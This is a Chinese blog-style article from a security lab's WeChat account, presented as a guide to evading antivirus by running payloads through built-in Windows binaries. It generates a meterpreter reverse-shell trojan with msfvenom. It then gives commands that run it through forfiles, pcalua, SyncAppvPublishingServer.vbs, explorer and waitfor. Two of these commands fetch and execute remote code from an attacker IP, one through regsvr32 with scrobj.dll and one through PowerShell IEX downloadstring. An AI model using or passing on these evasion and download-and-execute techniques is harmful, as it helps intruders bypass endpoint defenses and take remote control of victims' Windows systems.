原创 0xAXSDD Gamma实验室
Gamma实验室
微信号 HackerLearning
功能介绍 Gamma实验室是专注于网络安全攻防研究的实验室,不定时向外输出技术文章以及自主研发安全工具,技术输出不限于:渗透,内网,红队,免杀,病毒分析,逆向,ctfwp等,实验室只用于技术研究,一切违法犯罪与实验室无关!
__
收录于话题
“在渗透测试中,常常会遇到这种情况,上传一个shell上去,连上,却发现无法调用cmd.exe无法执行系统命令,这时候你往往想着,上传一个自己的cmd.exe上去,这是一套行云流水的操作,但把环境条件在变得苛刻一点,杀毒软件将监视二进制文件,例如cmd.exe,那么你会怎么做才能逃避检测?那么接下来就会介绍一些免杀思路。”
01
背景
Windows系统提供了多个二进制文件,可以使用它们执行任意命令。
在这,你是不是想到了什么?既然可以执行命令,那么它将帮助hacker们逃过检测,尤其是对cmd.exe监视的环境下。
当然这需要一些前提条件:未正确配置白名单规则(这里涵盖了文件名和路径),使得一些系统可执行文件能够执行。
接下来
让我们看看这些项免杀技术的闪光点!
02
正文
我们先用msfvenom生成一个木马程序:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.73.136 lport=8888 -f exe -o hacker.exe
Msf监听端口8888
Forfiles:
首先,要说明的是,forfiles是Windows Server 2003内置的命令行文件,其它系统未必适用。不过,win2003以上的系统,包括win7、windows server 2008均适用哦。forfiles 是一个命令实用程序,可以选择多个文件并在它们上运行命令,它通常用于批处理作业中,但可能会被滥用以执行任意命令或可执行文件。
语法须知:
默认搜索掩码为*,也使用参数 / p和/ m在Windows目录System32 和掩码calc.exe 上执行搜索,/ c参数之后的所有内容都是实际执行的命令。
命令:
forfiles /p c:\windows\system32 /m calc.exe /c C:\tmp\hacker.exe
Msf开启会话: ****
毫无疑问的是,Hacker.exe 将是forfiles.exe子进程。
当然也可以用windows自带的“运行”来执行命令。
Pcalua:
进程兼容性助手是Windows实用程序,当它检测到存在兼容性问题的软件时就会运行。该实用程序位于“ C:\ Windows \ System32 ”中,并且可以使用“ -a”参数执行命令。
命令:
pcalua.exe -a C:\tmp\hacker.exe
Msf打开会话:
值得注意的是,hacker.exe将是一个新的父进程。
后面就不一一截图了,大家自行下去验证就欧克了
SyncAppvPublishingServer:
SyncAppvPublishingServer 为启动Microsoft应用程序虚拟化(App-V)发布刷新操作,在下面的示例中,将在powershell中执行, Start-Process cmdlet用于运行可执行文件。
命令:
SyncAppvPublishingServer.vbs "n; Start-Process C:\tmp\hacker.exe"
由于SyncAppvPublishingServer将执行双引号中包含的所有内容,因此还可以使用“ regsvr32 ”方法从远程位置执行恶意有效负载。
命令:
SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.73.136:8080/jnQl1FJ.sct scrobj.dll"
Explorer:
可以将explorer.exe 用作执行方法。执行的有效负载将在系统上创建一个进程,该进程将把explorer.exe作为父进程。
命令:
explorer.exe C:\tmp\hacker.exeexplorer.exe /root,"C:\tmp\hacker.exe"explorer.exe 0XAXSDD-Hacker, "C:\tmp\hacker.exe"
Waitfor:
waitfor是Microsoft二进制文件,用于通过发送信号来跨网络同步计算机,也可用于执行任意命令或下载有效载荷。
命令:
waitfor hacker && PowerShell IEX(new-object net.webclient).downloadstring('http://192.168.73.136:8080/shell');waitfor /s 127.0.0.1 /si hacker
当然这里只总结了一些,也没总结完,但也值得学习与思考,希望能给你一个好的思路! ****
END
请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!
关注此公众号,各种福利领不停,轻轻松松学习hacker技术!
在看你就赞赞我!
扫码领hacker资料,常用工具,以及各种福利
转载是一种动力 分享是一种美德
0xAXSDD
微信扫一扫赞赏作者 赞赏
已喜欢,对作者说句悄悄话
取消 __
发送
最多40字,当前共字
人赞赏
上一页 1/3 下一页
长按二维码向我转账
受苹果公司新规定影响,微信 iOS 版的赞赏功能被关闭,可通过二维码转账支持公众号。
预览时标签不可点
收录于话题 #
个 __
上一篇 下一篇
阅读
分享 收藏
赞 在看
____已同步到看一看写下你的想法
前往“发现”-“看一看”浏览“朋友在看”
前往看一看
看一看入口已关闭
在“设置”-“通用”-“发现页管理”打开“看一看”入口
我知道了
__
已发送
取消 __
发送
免杀技巧-执行系统命令方式总结
最多200字,当前共字
__
发送中
写下你的留言
微信扫一扫
关注该公众号
微信扫一扫
使用小程序
取消 允许
取消 允许
知道了
长按识别前往小程序